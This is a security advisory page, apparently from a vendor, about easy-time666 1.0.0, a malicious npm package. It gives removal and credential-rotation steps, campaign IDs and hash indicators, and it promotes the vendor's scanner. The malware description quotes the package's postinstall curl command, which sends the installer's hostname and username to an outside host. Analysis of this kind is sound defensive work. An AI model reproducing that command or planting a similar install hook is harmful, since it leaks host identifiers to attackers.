Which versions of easy-time666 are malicious?

The following npm versions of easy-time666 are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate easy-time666 if I installed it?

Remove easy-time666 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is easy-time666 part of a known attack campaign?

Yes — easy-time666 is associated with the IN-MAL-2026-006401, IN-MAL-2026-006402 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect easy-time666 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking easy-time666 and packages like it before any post-install script runs.

Malicious package

easy-time666npm

Malicious code in easy-time666 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5749

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall easy-time666

What this malware does

package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami) over plain HTTP on every npm install, leaking the installer's hostname and current username to a non-publisher domain. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs JSON {ping:'npm'} to the same host (npm.wdf1.eyes.sh) over plain HTTP, reinforcing the install-time callback. This is the canonical recon-beacon pattern used to enumerate compromised hosts before staging follow-on payloads.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22

8d01edd925624ba53c0b659eab068e8252c70d276315c8074962dd29bdf9dd6c

Frequently asked questions

No. easy-time666 on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006401IN-MAL-2026-006402

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection